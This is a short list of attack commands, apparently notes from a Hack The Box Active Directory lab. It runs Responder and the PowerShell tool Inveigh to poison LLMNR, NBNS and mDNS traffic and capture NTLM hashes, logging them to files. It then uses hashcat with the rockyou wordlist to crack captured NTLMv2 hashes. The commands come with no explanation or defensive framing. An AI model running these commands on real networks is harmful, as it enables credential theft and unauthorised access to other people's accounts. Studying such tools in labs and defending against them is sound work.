hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
Responder.py -I eth0 -v --lm --disable-ess
PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput Y